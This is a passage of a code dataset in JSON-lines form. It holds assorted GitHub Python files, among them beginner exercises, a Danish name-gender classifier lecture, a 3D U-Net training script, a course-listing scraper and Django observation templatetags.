20, game_state)\n\n win = init_render(game_size)\n\n # run game loop\n for i in range(game_length):\n game_state = update_game(game_state)\n update_render(win, game_state)\n sleep(1 / game_rate)\n\n # finalize\n 
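# tear down the graphics window now that all game_length iterations have run\n    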
finalize_render(win)\n\nmain()","repo_name":"WillFigtree/PythonConway","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74277359808","text":"# Create a program that reads several numbers into a list. Then build two extra lists holding only the even and the odd values entered, respectively. At the end, show the contents of the three generated lists.\n\n# Creating the lists: lista, pares and ímpares\nlista = []\npares = []\nímpares = []\n\n# Ask the user for a number and append it to the list\nwhile True:\n    num = int(input('Digite um valor: '))\n    lista.append(num)\n    resp = str(input('Quer continuar? [S/N] ')).upper()\n\n# If the user answers \"N\", stop reading\n    if resp in 'N':\n        break\n\n# Sort the elements of \"lista\" in ascending order\nlista.sort()\n\n# If the number is even, append it to the \"pares\" list\nfor n in lista:\n    if n % 2 == 0:\n        pares.append(n)\n# Otherwise, append it to the \"ímpares\" list\n    else:\n        ímpares.append(n)\n\nprint('.'*50)\nprint(f'\\033[1;35mOs valores digitados foram: {lista}\\033[m')\nprint(f'\\033[1;33mNúmeros pares da lista: {pares}\\033[m')\nprint(f'\\033[1;34mNúmeros ímpares da lista: {ímpares}\\033[m')\n","repo_name":"simonecrepaldi/Desafios-de-Python-Curso-em-Video","sub_path":"exercícios/ex082.py","file_name":"ex082.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19495746468","text":"import sys\nimport numpy as np\nimport pdb\n\nclass StaticFns:\n\n    @staticmethod\n    def termination_fn(obs, act, next_obs):\n        assert len(obs.shape) == len(next_obs.shape) == len(act.shape)\n\n        z = next_obs[...,0]\n        done = (z < 1.0) + (z > 2.0)\n\n        done = done[...,None]\n        return done\n\n    @staticmethod\n    def cost_f(obs, act, next_obs, env):\n        assert len(obs.shape) == len(next_obs.shape) == len(act.shape)\n\n        z = next_obs[..., 0]\n        done = (z < 1.0) + (z > 2.0)\n        done = done[...,None]\n        done_cost = done*1.0\n        \n        y_dist = next_obs[..., -1:]\n        # obj_cost = y_dist/2-.75\n        # obj_cost = np.clip(obj_cost, 0, 1.1)\n\n        obj_cost = np.any(abs(y_dist)>3, axis=-1)[...,None]*1.0\n\n        cost = np.clip(done_cost+obj_cost, 0, 1)\n        return cost\n","repo_name":"anyboby/ConstrainedMBPO","sub_path":"mbpo/static/humanoidsafe.py","file_name":"humanoidsafe.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"25935469248","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 13 10:56:51 2023\n\n@author: chris\n\"\"\"\n# %% Directory\nimport os\nscript_directory = os.path.dirname(os.path.abspath(__file__))\nos.chdir(script_directory)\n\n# %% Libraries\nimport pandas as pd\nimport numpy as np\nimport random as r\nfrom sklearn.naive_bayes import CategoricalNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom sklearn.feature_extraction import DictVectorizer\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# %% Load data\nmale = pd.read_table(\"../Data/names_males.txt\", sep = \"\\t\", encoding='ISO-8859-1')\nfemale = pd.read_table(\"../Data/names_females.txt\", sep = \"\\t\", encoding='ISO-8859-1') \n\n# %% Data wrangling\n# Drop NA 
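rows so both name tables are complete before upsampling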
\nmale = male.dropna()\nfemale = female.dropna()\n\n# Upsample\nmale = pd.DataFrame({\n    'Navn': male['Navn'].repeat(male['ANTAL'])\n})\n\nfemale = pd.DataFrame({\n    'Navn': female['Navn'].repeat(female['ANTAL'])\n})\n\n# Names to lower\nmale['Navn'] = [i.lower() for i in male['Navn'].tolist()]\nfemale['Navn'] = [i.lower() for i in female['Navn'].tolist()]\n\n# Add gender labels to the data\nmale['gender'] = 'male'\nfemale['gender'] = 'female'\n\n# Combine male and female datasets\nlist_males = list(zip(male['Navn'], male['gender']))\nlist_females = list(zip(female['Navn'], female['gender']))\nlabeled_names = list_males + list_females\n\n# Shuffle\nr.seed(20)\nr.shuffle(labeled_names)\n\n# Features\nX = [name for (name, gender) in labeled_names]\ny = [gender for (name, gender) in labeled_names]\n\n# Convert labels\nlabel_encoder_y = LabelEncoder()\ny = label_encoder_y.fit_transform(y)\nlabel_encoder_X = LabelEncoder()\nX = label_encoder_X.fit_transform(X)\n\n# Reshape X\nX = np.array(X).reshape(-1, 1)\n\n# Split the data into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=20)\n\n# %% Classifier\n# Initialize and train the scikit-learn Naive Bayes classifier\nclassifier = CategoricalNB()\nclassifier.fit(X_train, y_train)\n\n# %%\n# Making classifier wrapper function\ndef classifier_wrapper(x):\n    # Contains all pre/post processing steps\n    x = [i.lower() for i in x]\n    x = label_encoder_X.transform(x)\n    x = np.array(x).reshape(-1, 1)\n    res = classifier.predict(x)\n    res = label_encoder_y.inverse_transform(res)\n    return res\n\n# %%\n# Classify some examples\n\n# Errors because of unseen:\nprint(classifier_wrapper(['Neo']))\nprint(classifier_wrapper(['Trinity']))\nprint(classifier_wrapper(['Casper']))\nprint(classifier_wrapper(['Marie']))\n\n# Name of Elon Musk's child\n# print(classifier_wrapper([\"XÆA-12\"]))\n# Error because it is unseen in training\n\n# %% Evaluate\n# Evaluate the accuracy on the test set\ny_pred = classifier.predict(X_test)\nprint(accuracy_score(y_test, y_pred))\n\n# Confusion Matrix\nconf_matrix = confusion_matrix(y_test, y_pred)\nprint('Confusion Matrix:')\nprint(conf_matrix)\n\n# Plot Confusion Matrix\nlabels = ['female', 'male']\nsns.heatmap(conf_matrix, annot=True, fmt='d', cmap='Blues', xticklabels=labels, yticklabels=labels)\nplt.xlabel('Predicted')\nplt.ylabel('True')\nplt.title('Confusion Matrix')\nplt.show()\n\n# Normalize the confusion matrix to percentages\nconf_matrix_pct = conf_matrix.astype('float') / conf_matrix.sum(axis=1)[:, np.newaxis]\nprint('Normalized Confusion Matrix:')\nprint(conf_matrix_pct)\n\n# Plot Normalized Confusion Matrix\nlabels = ['female', 'male']\nsns.heatmap(conf_matrix_pct, annot=True, fmt='.2f', cmap='Blues', xticklabels=labels, yticklabels=labels)\nplt.xlabel('Predicted')\nplt.ylabel('True')\nplt.title('Normalized Confusion Matrix (%)')\nplt.show()\n\n# %% Test on Danish census data from the year 1787 from Link Lives\n# https://link-lives.dk/en/about-link-lives/\n# This used to not contain gender. 
Now it does.\ndf1787 = pd.read_csv(\"../Data/Names_gender1787.csv\")\nprint(df1787)\n\n# Take only the first of the first names\ndf1787['clean_names'] = df1787['first_names'].str.split().str[0]\n\n# Remove unknown names\ndf1787_clean = df1787[df1787['clean_names'].isin(male['Navn']) | df1787['clean_names'].isin(female['Navn'])]\ndf1787_removed = df1787[~(df1787['clean_names'].isin(male['Navn']) | df1787['clean_names'].isin(female['Navn']))]\n\n# Count kept/removed observations\ndef N_of(x): \n    return np.sum(x['n']) \nN_all = N_of(df1787)\nN_removed = N_of(df1787_removed) \nN_kept = N_of(df1787_clean)\n\n# Print descriptives\nprint(f\"All obs: {N_all}\")\nprint(f\"Obs. kept: {N_kept}; Pct: {100*round(N_kept/N_all, 4)}%\")\nprint(f\"Obs. removed: {N_removed}; Pct: {100*round(N_removed/N_all, 4)}%\")\n\n# Transform to features\nX = label_encoder_X.transform(df1787_clean['clean_names'])\n# Reshape X\nX = np.array(X).reshape(-1, 1)\n\n# Predict \ny_pred = classifier.predict(X)\n\n# ==== Test performance ====\n# True labels 1787\ny = label_encoder_y.transform(df1787_clean['gender'])\n\n# Accuracy estimated with weights from population counts in 1787\nweights = df1787_clean['n'].tolist()\naccuracy = accuracy_score(y, y_pred, sample_weight = weights)\nprint(f\"\\nAccuracy of Naïve Bayes model on 1787 data: {100*round(accuracy, 4)}%\")\nprint(f\"Corrected for unfound names: {100*round(accuracy*N_kept/N_all, 4)}%\")\n\n# Confusion Matrix\nconf_matrix = confusion_matrix(y, y_pred, sample_weight = weights)\nprint('Confusion Matrix:')\nprint(conf_matrix)\n\n# Plot Confusion Matrix\nlabels = ['female', 'male']\nsns.heatmap(conf_matrix, annot=True, fmt='d', cmap='Blues', xticklabels=labels, yticklabels=labels)\nplt.xlabel('Predicted')\nplt.ylabel('True')\nplt.title('Confusion Matrix')\nplt.show()\n\n# Normalize the confusion matrix to percentages\nrow_sums = conf_matrix.sum(axis=1)[:, np.newaxis]\nconf_matrix_pct = conf_matrix.astype('float') / row_sums\nprint('Normalized Confusion Matrix:')\nprint(conf_matrix_pct)\n\n# Plot Normalized Confusion Matrix\nlabels = ['female', 'male']\nsns.heatmap(conf_matrix_pct, annot=True, fmt='.4f', cmap='Blues', xticklabels=labels, yticklabels=labels)\nplt.xlabel('Predicted')\nplt.ylabel('True')\nplt.title('Normalized Confusion Matrix (%)')\nplt.show()\n\n","repo_name":"christianvedels/News_and_Market_Sentiment_Analytics","sub_path":"Lecture 4 - Classification pt 2/Code/Gender_classification_all_Danish_names.py","file_name":"Gender_classification_all_Danish_names.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37423937389","text":"# program that builds a third list from the two lists that are read in\nx=[]\nz=[]\nnumero = 0\n\nwhile True:\n    numero = float(input(\"Digite um elemento da primeira lista (0 para sair): \"))\n    if numero == 0:\n        break\n    x += [numero]\n\nwhile True:\n    numero = float(input(\"Digite um elemento da segunda lista (0 para sair): \"))\n    if numero == 0:\n        break\n    z += [numero]\n\nprint (f\" a soma das listas é {x + z}\")\n\n","repo_name":"Rodrigodebarros17/Livropython","sub_path":"CAP6/6-2.py","file_name":"6-2.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16346060322","text":"import numpy as np\nimport tensorflow as tf\n\n################################################################################\ndef PairwiseEuclidian(X,Y):\n    return 
tf.reduce_sum((tf.expand_dims(X, 1) - tf.expand_dims(Y, 0))**2, 2)\n\ndef PickKNearest(distMatrix, k):\n\tdists, indices_k = tf.nn.top_k(-distMatrix, k)\n\n\t'''\n\tThis is the number of training tensors\n\tUse this to determine how long to make the responsibility tensor\n\t'''\n\ttrainingNums = tf.shape(distMatrix)[1]\n\n\t'''\n\tThis creates a tensor of shape [trainingNums], then expands it for the\n\telement wise comparison in tf.equal\n\t'''\n\tindex = tf.range(trainingNums)\n\tprint(sess.run(indices_k))\n\tindex = tf.expand_dims(index, 1)\n\t\n\n\t# This prepares the tensor for the element wise comparison\n\tindices_k = tf.expand_dims(indices_k, 1)\n\n\t'''\n\tThis creates a matrix of 0s and 1s that represent whether or not a training \n\tpoint is used, then divides it by k to obtain the correct tensor for each \n\tnew test input.\n\tThe responsibility vectors are row vectors\n\t'''\n\tresponsibilites = \\\n\t\t\ttf.reduce_sum( \\\n\t\t\t\ttf.to_float(tf.equal(index, indices_k)), 2 \\\n\t\t\t) / tf.to_float(k)\n\n\treturn responsibilites\n################################################################################\ninit = tf.global_variables_initializer()\n\nsess = tf.InteractiveSession()\nsess.run(init)\n################################################################################\n\n'''\nThe format of the input matrix is the same as the output of part 1, where X is \nthe new data and Z is the trained data.\n'''\nX = tf.constant( \\\n\t[\n\t\t[1,2],\n\t\t[3,4],\n\t\t[9,3]\n\t])\nZ = tf.constant( \\\n\t[\n\t\t[8,2],\n\t\t[3,4],\n\t\t[3,6],\n\t\t[3,3],\n\t\t[12,34],\n\t\t[0,0]\n\t])\n\nprint(sess.run(PairwiseEuclidian(X,Z)))\nprint(sess.run(PickKNearest(PairwiseEuclidian(X,Z), 3)))\n","repo_name":"michaelvu97/ECE521","sub_path":"ASST1/2_1.py","file_name":"2_1.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"43956639956","text":"from itertools import permutations\r\n\r\npermutations = list(permutations([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]))\r\n\r\ndigits = []\r\nfor i in permutations[999999]:\r\n digits.append(str(i))\r\n\r\nvalue = ''.join(digits)\r\n\r\nprint(value)","repo_name":"haticesaike/Project_Euler","sub_path":"problem0024.py","file_name":"problem0024.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24381469608","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\n'''\ntf.config.optimizer.set_jit(True)\ngpus = tf.config.experimental.list_physical_devices('GPU')\nif gpus:\n # Restrict TensorFlow to only use the first GPU\n try:\n tf.config.experimental.set_visible_devices(gpus[0], 'GPU')\n except RuntimeError as e:\n # Visible devices must be set at program startup\n print(e)\n'''\n\nfrom tensorflow.keras.optimizers import Adam\nfrom unet_config import*\nimport os\nimport datetime\nfrom Unet3D import Unet3D\nimport numpy as np\nimport random\n\ndef dice_coe(y_true,y_pred, loss_type='jaccard', smooth=1.):\n\n y_true_f = tf.reshape(y_true,[-1])\n y_pred_f = tf.reshape(y_pred,[-1])\n\n intersection = tf.reduce_sum(y_true_f * y_pred_f)\n\n if loss_type == 'jaccard':\n union = tf.reduce_sum(tf.square(y_pred_f)) + tf.reduce_sum(tf.square(y_true_f))\n\n elif loss_type == 'sorensen':\n union = tf.reduce_sum(y_pred_f) + tf.reduce_sum(y_true_f)\n\n else:\n raise ValueError(\"Unknown `loss_type`: %s\" % 
loss_type)\n\n    return (2. * intersection + smooth) / (union + smooth)\n\ndef dice_loss(y_true,y_pred, loss_type='jaccard', smooth=1.):\n\n    y_true_f = tf.cast(tf.reshape(y_true,[-1]),tf.float32)\n    y_pred_f =tf.cast(tf.reshape(y_pred,[-1]),tf.float32)\n\n    intersection = tf.reduce_sum(y_true_f * y_pred_f)\n\n    if loss_type == 'jaccard':\n        union = tf.reduce_sum(tf.square(y_pred_f)) + tf.reduce_sum(tf.square(y_true_f))\n\n    elif loss_type == 'sorensen':\n        union = tf.reduce_sum(y_pred_f) + tf.reduce_sum(y_true_f)\n\n    else:\n        raise ValueError(\"Unknown `loss_type`: %s\" % loss_type)\n\n    return (1-(2. * intersection + smooth) / (union + smooth))\n\n\n@tf.function\ndef decode_SEGct(Serialized_example):\n\n    features={\n        'image':tf.io.FixedLenFeature([],tf.string),\n        'mask':tf.io.FixedLenFeature([],tf.string),\n        'Height':tf.io.FixedLenFeature([],tf.int64),\n        'Weight':tf.io.FixedLenFeature([],tf.int64),\n        'Depth':tf.io.FixedLenFeature([],tf.int64),\n        'Sub_id':tf.io.FixedLenFeature([],tf.string)\n\n    }\n    examples=tf.io.parse_single_example(Serialized_example,features)\n    ##Decode image as float\n    image_1 = tf.io.decode_raw(examples['image'], float)\n    #Decode mask as int32\n    mask_1 = tf.io.decode_raw(examples['mask'], tf.int32)\n    ##Subject id is already in bytes format\n    #sub_id=examples['Sub_id']\n    img_shape=[examples['Height'],examples['Weight'],examples['Depth']]\n    #img_shape2=[img_shape[0],img_shape[1],img_shape[2]]\n    print(img_shape)\n    #Reshaping the data\n    img=tf.reshape(image_1,img_shape)\n    mask=tf.reshape(mask_1,img_shape)\n    #Because CNN expects (batch,H,W,D,CHANNEL)\n    img=tf.expand_dims(img, axis=-1)\n    mask=tf.expand_dims(mask, axis=-1)\n    ###casting values\n    img=tf.cast(img, tf.float32)\n    mask=tf.cast(mask,tf.int32)\n\n    return img,mask\n\n\n\ndef getting_list(path):\n    a=[file for file in os.listdir(path) if file.endswith('.tfrecords')]\n    all_tfrecoeds=random.sample(a, len(a))\n    #all_tfrecoeds.sort(key=lambda f: int(filter(str.isdigit, f)))\n    list_of_tfrecords=[]\n    for i in range(len(all_tfrecoeds)):\n        tf_path=path+all_tfrecoeds[i]\n        list_of_tfrecords.append(tf_path)\n    return list_of_tfrecords\n\n#--Training Decoder\ndef load_training_tfrecords(record_mask_file,batch_size):\n    dataset=tf.data.Dataset.list_files(record_mask_file).interleave(lambda x: tf.data.TFRecordDataset(x),cycle_length=NUMBER_OF_PARALLEL_CALL,num_parallel_calls=NUMBER_OF_PARALLEL_CALL)\n    dataset=dataset.map(decode_SEGct,num_parallel_calls=NUMBER_OF_PARALLEL_CALL).repeat(TRAING_EPOCH).batch(batch_size)\n    batched_dataset=dataset.prefetch(PARSHING)\n    return batched_dataset\n\n#--Validation Decoder\ndef load_validation_tfrecords(record_mask_file,batch_size):\n    dataset=tf.data.Dataset.list_files(record_mask_file).interleave(tf.data.TFRecordDataset,cycle_length=NUMBER_OF_PARALLEL_CALL,num_parallel_calls=NUMBER_OF_PARALLEL_CALL)\n    dataset=dataset.map(decode_SEGct,num_parallel_calls=NUMBER_OF_PARALLEL_CALL).repeat(TRAING_EPOCH).batch(batch_size)\n    batched_dataset=dataset.prefetch(PARSHING)\n    return batched_dataset\n\n\ndef Training():\n\n    #TensorBoard\n    logdir = os.path.join(\"LungSEG_Log_March30_2020\", datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n    tensorboard_callback = tf.keras.callbacks.TensorBoard(logdir, histogram_freq=1)\n    ##csv_logger\n    csv_logger = tf.keras.callbacks.CSVLogger(TRAINING_CSV)\n    ##Model-checkpoints\n    path=TRAINING_SAVE_MODEL_PATH\n    model_path=os.path.join(path, \"LungSEGModel_{val_loss:.2f}_{epoch}.h5\")\n    Model_callback= 
tf.keras.callbacks.ModelCheckpoint(filepath=model_path,save_best_only=False,save_weights_only=True,monitor=ModelCheckpoint_MOTITOR,verbose=1)\n\n tf_train=getting_list(TRAINING_TF_RECORDS)\n tf_val=getting_list(VALIDATION_TF_RECORDS)\n\n traing_data=load_training_tfrecords(tf_train,BATCH_SIZE)\n Val_batched_dataset=load_validation_tfrecords(tf_val,BATCH_SIZE)\n\n if (NUM_OF_GPU==1):\n\n if RESUME_TRAINING==1:\n inputs = tf.keras.Input(shape=INPUT_PATCH_SIZE, name='CT')\n Model_3D=Unet3D(inputs,num_classes=NUMBER_OF_CLASSES)\n Model_3D.load_weights(RESUME_TRAIING_MODEL)\n initial_epoch_of_training=TRAINING_INITIAL_EPOCH\n Model_3D.compile(optimizer=OPTIMIZER, loss=[dice_loss], metrics=['accuracy',dice_coe])\n Model_3D.summary()\n else:\n initial_epoch_of_training=0\n inputs = tf.keras.Input(shape=INPUT_PATCH_SIZE, name='CT')\n Model_3D=Unet3D(inputs,num_classes=NUMBER_OF_CLASSES)\n Model_3D.compile(optimizer=OPTIMIZER, loss=[dice_loss], metrics=['accuracy',dice_coe])\n Model_3D.summary()\n\n Model_3D.fit(traing_data,\n steps_per_epoch=TRAINING_STEP_PER_EPOCH,\n epochs=TRAING_EPOCH,\n initial_epoch=initial_epoch_of_training,\n validation_data=Val_batched_dataset,\n validation_steps=VALIDATION_STEP,\n callbacks=[tensorboard_callback,csv_logger,Model_callback])\n\n ###Multigpu----\n else:\n mirrored_strategy = tf.distribute.MirroredStrategy(DISTRIIBUTED_STRATEGY_GPUS)\n with mirrored_strategy.scope():\n if RESUME_TRAINING==1:\n inputs = tf.keras.Input(shape=INPUT_PATCH_SIZE, name='CT')\n Model_3D=Unet3D(inputs,num_classes=NUMBER_OF_CLASSES)\n Model_3D.load_weights(RESUME_TRAIING_MODEL)\n initial_epoch_of_training=TRAINING_INITIAL_EPOCH\n Model_3D.compile(optimizer=OPTIMIZER, loss=[dice_loss], metrics=['accuracy',dice_coe])\n Model_3D.summary()\n else:\n initial_epoch_of_training=0\n inputs = tf.keras.Input(shape=INPUT_PATCH_SIZE, name='CT')\n Model_3D=Unet3D(inputs,num_classes=NUMBER_OF_CLASSES)\n Model_3D.compile(optimizer=OPTIMIZER, loss=[dice_loss], metrics=['accuracy',dice_coe])\n Model_3D.summary()\n\n\n\n Model_3D.fit(traing_data,steps_per_epoch=TRAINING_STEP_PER_EPOCH,epochs=TRAING_EPOCH,initial_epoch=initial_epoch_of_training,validation_data=Val_batched_dataset,validation_steps=VALIDATION_STEP,\n callbacks=[tensorboard_callback,csv_logger,Model_callback])\n\nif __name__ == '__main__':\n Training()\n","repo_name":"fitushar/3DUnet_tensorflow2.0","sub_path":"Train_Unet3D.py","file_name":"Train_Unet3D.py","file_ext":"py","file_size_in_byte":7506,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"43"} +{"seq_id":"15956911588","text":"import webapp2\nimport json\nimport OCIScraper\nimport logging\n\nfrom google.appengine.ext import ndb\n\n#ndb model class for each Course that we are storing.\nclass Course(ndb.Model):\n title = ndb.StringProperty()\n professor = ndb.StringProperty()\n time = ndb.StringProperty()\n location = ndb.StringProperty()\n distReqAreas = ndb.StringProperty()\n term = ndb.StringProperty()\n instructorPermissionRequired = ndb.StringProperty()\n final = ndb.StringProperty()\n courseNum = ndb.StringProperty()\n\n description = ndb.TextProperty()\n\n departmentPermissionRequired = ndb.BooleanProperty()\n readingPeriod = ndb.BooleanProperty()\n\n classRating = ndb.FloatProperty() \n professorRating = ndb.FloatProperty()\n workRating = ndb.FloatProperty()\n\n OCInumber = ndb.IntegerProperty()\n\n\n \n\nclass JSONHandler(webapp2.RequestHandler):\n def get(self):\n courses = ndb.gql(\"SELECT * FROM Course\")\n coursesjson = 
{\"courses\": []}\n for course in courses:\n coursesjson[\"courses\"].append({\"title\": course.title,\n \"professor\": course.professor,\n \"time\": course.time,\n \"location\": course.location,\n \"distReqAreas\": course.distReqAreas,\n \"term\": course.term,\n \"description\": course.description,\n \"finalDescription\" : course.final,\n \"instructorPermissionRequired\": course.instructorPermissionRequired,\n \"departmentPermissionRequired\": course.departmentPermissionRequired,\n \"readingPeriod\":course.readingPeriod,\n \"classRating\": course.classRating,\n \"professorRating\": course.professorRating,\n \"workRating\": course.workRating,\n \"courseNum\": course.courseNum,\n \"OCInumber\": course.OCInumber})\n\n self.response.write(json.dumps(coursesjson))\n\n\n\nclass FetchCoursesHandler(webapp2.RequestHandler):\n def get(self):\n for i in range (20001, 25000):\n courseText = OCIScraper.courseNumberTest(i, 201301)\n\n if courseText:\n courseInfoDict = OCIScraper.parseCourseText(courseText)\n oci = i\n c = Course(title = courseInfoDict[\"courseName\"],\n professor = courseInfoDict[\"professor\"],\n time = courseInfoDict[\"time\"],\n location = courseInfoDict[\"location\"],\n distReqAreas = courseInfoDict[\"distReqAreas\"],\n term = courseInfoDict[\"term\"],\n description = courseInfoDict[\"description\"],\n final = courseInfoDict[\"finalDescription\"],\n instructorPermissionRequired = courseInfoDict[\"instructorPermissionRequired\"],\n departmentPermissionRequired = courseInfoDict[\"departmentPermissionRequired\"],\n readingPeriod = courseInfoDict[\"readingPeriod\"],\n classRating = courseInfoDict[\"classRating\"],\n professorRating = courseInfoDict[\"professorRating\"],\n workRating = courseInfoDict[\"workRating\"],\n courseNum = courseInfoDict[\"courseNum\"],\n OCInumber = oci,\n id = str(oci))\n \n if Course.get_by_id(str(oci)) is None:\n c.put()\n logging.info(str(i))\n\n\n\n\napp = webapp2.WSGIApplication([\n ('/courses', JSONHandler),\n ('/fetch', FetchCoursesHandler)\n], debug=True)\n","repo_name":"andrewmalta13/B9Hackathon","sub_path":"9book/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"23216893295","text":"from datetime import datetime, timedelta\nfrom urllib.parse import urlencode\n\nfrom django import forms, template\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom guardian.shortcuts import get_objects_for_user\nfrom plotly import offline\nimport plotly.graph_objs as go\n\nfrom tom_observations.forms import AddExistingObservationForm, UpdateObservationId\nfrom tom_observations.models import ObservationRecord\nfrom tom_observations.facility import get_service_class, get_service_classes\nfrom tom_observations.observation_template import ApplyObservationTemplateForm\nfrom tom_observations.utils import get_sidereal_visibility\nfrom tom_targets.models import Target\n\n\nregister = template.Library()\n\n\n@register.inclusion_tag('tom_observations/partials/update_status_button.html', takes_context=True)\ndef update_status_button(context):\n \"\"\"\n An inelegant way of passing filters in query parameters while updating observation statuses.\n Used in ObservationListView to retain filters.\n \"\"\"\n return {'query_params': urlencode(context['request'].GET.dict())}\n\n\n@register.filter\ndef display_obs_type(value):\n \"\"\"\n This converts SAMPLE_TITLE into Sample Title. 
Used to display the all-caps observation type as a title in the tabs.\n    \"\"\"\n    return value.replace('_', ' ').title()\n\n\n@register.inclusion_tag('tom_observations/partials/observing_buttons.html')\ndef observing_buttons(target):\n    \"\"\"\n    Displays the observation buttons for all facilities available in the TOM.\n    \"\"\"\n    facilities = get_service_classes()\n    return {'target': target, 'facilities': facilities}\n\n\n@register.inclusion_tag('tom_observations/partials/existing_observation_form.html')\ndef existing_observation_form(target):\n    \"\"\"\n    Renders a form for adding an existing API-based observation to a Target.\n    \"\"\"\n    return {'form': AddExistingObservationForm(initial={'target_id': target.id})}\n\n\n@register.inclusion_tag('tom_observations/partials/update_observation_id_form.html')\ndef update_observation_id_form(obsr):\n    \"\"\"\n    Renders a form for updating the observation ID for an ObservationRecord.\n    \"\"\"\n    return {'form': UpdateObservationId(initial={'obsr_id': obsr.id, 'observation_id': obsr.observation_id})}\n\n\n@register.inclusion_tag('tom_observations/partials/observation_type_tabs.html', takes_context=True)\ndef observation_type_tabs(context):\n    \"\"\"\n    Displays tabs in observation creation form representing each available observation type.\n    \"\"\"\n    request = context['request']\n    query_params = request.GET.copy()\n    observation_type = query_params.pop('observation_type', None)\n    return {\n        'params': urlencode(query_params),\n        'type_choices': context['type_choices'],\n        'observation_type': observation_type,\n        'facility': context['form']['facility'].value,\n        'target_id': request.GET.get('target_id')\n    }\n\n\n@register.inclusion_tag('tom_observations/partials/facility_observation_form.html')\ndef facility_observation_form(target, facility, observation_type):\n    \"\"\"\n    Displays a form for submitting an observation for a specific facility and observation type, e.g., imaging.\n    \"\"\"\n    facility_class = get_service_class(facility)()\n    initial_fields = {\n        'target_id': target.id,\n        'facility': facility,\n        'observation_type': observation_type\n    }\n    obs_form = facility_class.get_form(observation_type)(initial=initial_fields)\n    obs_form.helper.form_action = reverse('tom_observations:create', kwargs={'facility': facility})\n\n    return {'obs_form': obs_form}\n\n\n@register.inclusion_tag('tom_observations/partials/observation_plan.html')\ndef observation_plan(target, facility=None, length=2, interval=60, airmass_limit=None):\n    \"\"\"\n    Displays form and renders plot for visibility calculation. Using this templatetag to render a plot requires that
Using this templatetag to render a plot requires that\n the context of the parent view have values for start_time, end_time, and airmass.\n \"\"\"\n\n visibility_graph = ''\n start_time = datetime.now()\n end_time = start_time + timedelta(days=length)\n\n visibility_data = get_sidereal_visibility(target, start_time, end_time, interval, airmass_limit, facility)\n i = 0\n plot_data = []\n for site, data in visibility_data.items():\n plot_data.append(go.Scatter(x=data[0], y=data[1], mode='markers+lines', marker={'symbol': i}, name=site))\n i += 1\n layout = go.Layout(\n xaxis={'title': 'Date'},\n yaxis={'autorange': 'reversed', 'title': 'Airmass'}\n )\n visibility_graph = offline.plot(\n go.Figure(data=plot_data, layout=layout), output_type='div', show_link=False\n )\n\n return {\n 'visibility_graph': visibility_graph\n }\n\n\n@register.inclusion_tag('tom_observations/partials/observation_list.html', takes_context=True)\ndef observation_list(context, target=None):\n \"\"\"\n Displays a list of all observations in the TOM, limited to an individual target if specified.\n \"\"\"\n if target:\n if settings.TARGET_PERMISSIONS_ONLY:\n observations = target.observationrecord_set.all()\n else:\n observations = get_objects_for_user(\n context['request'].user,\n 'tom_observations.view_observationrecord'\n ).filter(target=target)\n else:\n observations = ObservationRecord.objects.all().order_by('-created')\n return {'observations': observations}\n\n\n@register.inclusion_tag('tom_observations/partials/observationtemplate_run.html')\ndef observationtemplate_run(target):\n \"\"\"\n Renders the form for running an observation template.\n \"\"\"\n form = ApplyObservationTemplateForm(initial={'target': target})\n form.fields['target'].widget = forms.HiddenInput()\n return {'form': form}\n\n\n@register.inclusion_tag('tom_observations/partials/observationtemplate_from_record.html')\ndef observationtemplate_from_record(obsr):\n \"\"\"\n Renders a button that will pre-populate and observation template form with parameters from the specified\n ``ObservationRecord``.\n \"\"\"\n obs_params = obsr.parameters\n obs_params.pop('target_id', None)\n template_params = urlencode(obs_params)\n return {\n 'facility': obsr.facility,\n 'params': template_params\n }\n\n\n@register.inclusion_tag('tom_observations/partials/observation_distribution.html')\ndef observation_distribution(observations):\n \"\"\"\n Displays a plot showing on a map the locations of all observations recorded in the TOM.\n \"\"\"\n\n # \"distinct\" query is not supported, must manually find distinct observation per target\n sorted_observations = observations.order_by('scheduled_end') # ascending so that only the max is preserved\n observation_targets = {}\n for obs in sorted_observations:\n observation_targets[obs.target_id] = (obs.status, obs.terminal)\n\n observation_no_status = [t for t in observation_targets.keys()\n if not observation_targets[t][0]] # status==\"\"\n observation_terminal = [t for t in observation_targets.keys()\n if observation_targets[t][0]\n and observation_targets[t][1]] # status!=\"\" and terminal\n observation_non_terminal = [t for t in observation_targets.keys()\n if observation_targets[t][0]\n and not observation_targets[t][1]] # status!=\"\" and not terminal\n\n targets_no_status = Target.objects.filter(pk__in=observation_no_status)\n targets_terminal = Target.objects.filter(pk__in=observation_terminal)\n targets_non_terminal = Target.objects.filter(pk__in=observation_non_terminal)\n\n locations_no_status = 
